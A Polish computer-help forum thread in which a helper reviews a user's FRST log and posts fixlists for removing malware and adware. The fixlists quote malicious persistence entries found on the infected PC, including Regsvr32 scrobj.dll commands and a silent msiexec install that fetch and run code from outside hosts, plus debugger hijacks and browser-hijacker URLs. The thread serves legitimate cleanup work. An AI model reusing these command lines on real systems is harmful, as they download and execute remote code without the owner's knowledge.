Elektroda.pl
Elektroda.pl
X
CControls
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Prośba o sprawdzenie loga frst

jarhead184 23 Maj 2017 21:49 516 6
  • CControls
  • Pomocny post
    #2 23 Maj 2017 22:30
    Kolobos
    Spec od komputerów

    Odinstaluj: AVG PC TuneUp 2015

    Wykonaj Fixlist.txt dla FRST:
    Task: {3963C34B-12C8-4F84-B2FC-1CFDEDDDAF7E} - System32\Tasks\{CE8BEB7B-EA7C-4DFB-B9A8-D4BD9F53A457} => pcalua.exe -a "C:\Program Files (x86)\AVG Web TuneUp\UNINSTALL.exe" -c /PROMPT /UNINSTALL
    Task: {70AB8BFB-7ABB-4DCC-B6DA-FDFAD4FF8751} - System32\Tasks\TuneUpUtilities_Task_BkGndMaintenance2013 => C:\Program Files (x86)\AVG\AVG PC TuneUp\OneClick.exe [2015-02-25] (AVG Technologies)
    Task: {D45AD514-3C92-4F0A-B1EC-66693B33E78D} - System32\Tasks\KarolWobblesBiocyclesV2 => Rundll32.exe ComfitsRends.dll,main 7 1 <==== UWAGA
    Task: {D634706C-6C0C-481E-8E20-365DBE986043} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj88RUF8MTLSRWU3N8FdOTF3MTlYRjwcOUU1RUY5MdNYRF== scrobj.dll
    Task: {EEF912A3-60B7-4636-9937-9243D052E508} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj88RUF8MTLSRWU3N8FdOTF3MTlYRjwcOUU1RUY5MdNYRF== scrobj.dll
    HKU\S-1-5-21-2378718645-2658661782-1109129007-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj88RUF8MTLSRWU3N8FdOTF3MTlYRjwcOUU1RUY5MdNYRF== /q
    HKU\S-1-5-21-2378718645-2658661782-1109129007-1000\...\Policies\Explorer: []
    HKU\S-1-5-21-2378718645-2658661782-1109129007-1000\...\MountPoints2: I - I:\Setup.exe
    HKU\S-1-5-21-2378718645-2658661782-1109129007-1000\...\MountPoints2: {558b0a00-8b61-11e5-810d-e4d53dbd1688} - H:\setup.exe
    HKU\S-1-5-21-2378718645-2658661782-1109129007-1000\...\MountPoints2: {57228b08-fe5c-11e5-8bdc-e4d53dbd1688} - F:\setup.exe
    HKU\S-1-5-21-2378718645-2658661782-1109129007-1000\...\MountPoints2: {5c78e6f1-a95f-11e4-ae10-e4d53dbd1688} - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL F:\Common_Handset_USB_Driver.exe
    HKU\S-1-5-21-2378718645-2658661782-1109129007-1000\...\MountPoints2: {d7058cb1-9db3-11e5-bc0b-e4d53dbd1688} - I:\Setup.exe
    IFEO\DisplaySwitch.exe: [Debugger]
    IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
    IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
    IFEO\taskmgr.exe: [Debugger]
    FF Extension: (Brak nazwy) - C:\Program Files (x86)\TomTom HOME 2\xul\extensions\MapShare-status@tomtom.com [nie znaleziono]
    FF NewTab: Mozilla\Firefox\Profiles\ydp27rbf.default -> hxxp://www.luckysearch123.com?type=hp&ts=...;z=deb910716caf3839c4766e2g8zatfc6t0tae4q2o9g
    FF Homepage: Mozilla\Firefox\Profiles\ydp27rbf.default -> hxxp://www.luckysearch123.com?type=hp&ts=...;z=deb910716caf3839c4766e2g8zatfc6t0tae4q2o9g




    FF Extension: (Brak nazwy) - C:\Users\Karol\AppData\Roaming\Mozilla\Firefox\Profiles\ydp27rbf.default\extensions\arthurj8283@gmail.com [nie znaleziono]
    CHR DefaultSearchURL: Default -> hxxp://www.luckysearch123.com/search.php?type...23eac3d1b1b8cf14a99g9zdtez0w8e0w5gacbb&q={searchTerms}
    CHR DefaultSearchKeyword: Default -> luck
    CHR HKU\S-1-5-21-2378718645-2658661782-1109129007-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mbckjcfnjmoiinpgddefodcighgikkgn] - hxxps://clients2.google.com/service/update2/crx
    2017-05-11 16:09 - 2017-05-15 15:32 - 00000000 _____ C:\Windows\SysWOW64\3333333
    2017-05-11 16:08 - 2017-05-17 16:26 - 00000000 _____ C:\Windows\SysWOW64\00
    2017-05-11 16:08 - 2017-05-15 15:32 - 00000000 _____ C:\Windows\SysWOW64\1111111
    2017-05-09 15:16 - 2017-05-09 15:16 - 00000000 ____D C:\Users\Public\Documents\Google
    2017-05-09 14:32 - 2017-05-17 16:35 - 00000000 _____ C:\Windows\SysWOW64\1111
    2017-05-07 14:48 - 2017-05-23 20:17 - 00000000 ____D C:\AdwCleaner
    2017-05-05 15:27 - 2017-05-17 16:26 - 00000000 _____ C:\Windows\SysWOW64\11
    2017-04-27 21:33 - 2017-04-27 21:33 - 00000000 ____D C:\Windows\psgo
    2017-04-25 21:27 - 2017-05-22 10:18 - 00000000 ____D C:\Program Files\MK
    2017-05-17 16:26 - 2017-04-20 08:02 - 00000000 _____ C:\Windows\SysWOW64\22
    2017-05-17 16:26 - 2017-04-17 20:07 - 00000000 ____D C:\Program Files (x86)\BiaoJi
    2017-05-07 20:51 - 2017-04-17 21:17 - 00000000 _____ C:\Windows\SysWOW64\2
    EmptyTemp:

    Po wykonaniu usun katalog C:\FRST i to wszystko.

    0
  • CControls
  • #3 23 Maj 2017 23:40
    jarhead184
    Poziom 2  

    Bardzo dziekuje. Ponadto martwi mnie HomeGroupUser$ w nazwie użytkowników. Nigdy nie otwierałem takiego konta. Proszę o pomoc czy wszystko jest ok, czy ktoś ma dostep do mojego komputera. Prośba o sprawdzenie loga frst

    0
  • #6 24 Maj 2017 21:31
    Kolobos
    Spec od komputerów

    Odinstaluj: Google Toolbar for Internet Explorer

    Wykonaj Fixlist.txt dla FRST:
    Task: {51742968-CF07-401A-8C6D-050693312C8C} - System32\Tasks\ByteFence Scan => C:\Program Files\ByteFence\ByteFence.exe <==== UWAGA
    Hosts:
    ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
    GroupPolicy: Ograniczenia - Chrome <======= UWAGA
    CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <======= UWAGA
    S2 TuneUp.UtilitiesSvc; "C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe" [X]
    S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X]
    S3 TuneUpUtilitiesDrv; \??\C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys [X]
    2015-01-08 19:51 - 2015-01-15 22:57 - 0000387 _____ () C:\Users\aaa\AppData\Roaming\sp_data.sys

    Usun C:\FRST.

    0
  • #7 10 Cze 2017 06:22
    jarhead184
    Poziom 2  

    Bardzo dziękuje za pomoc. Pozdrawiam

    0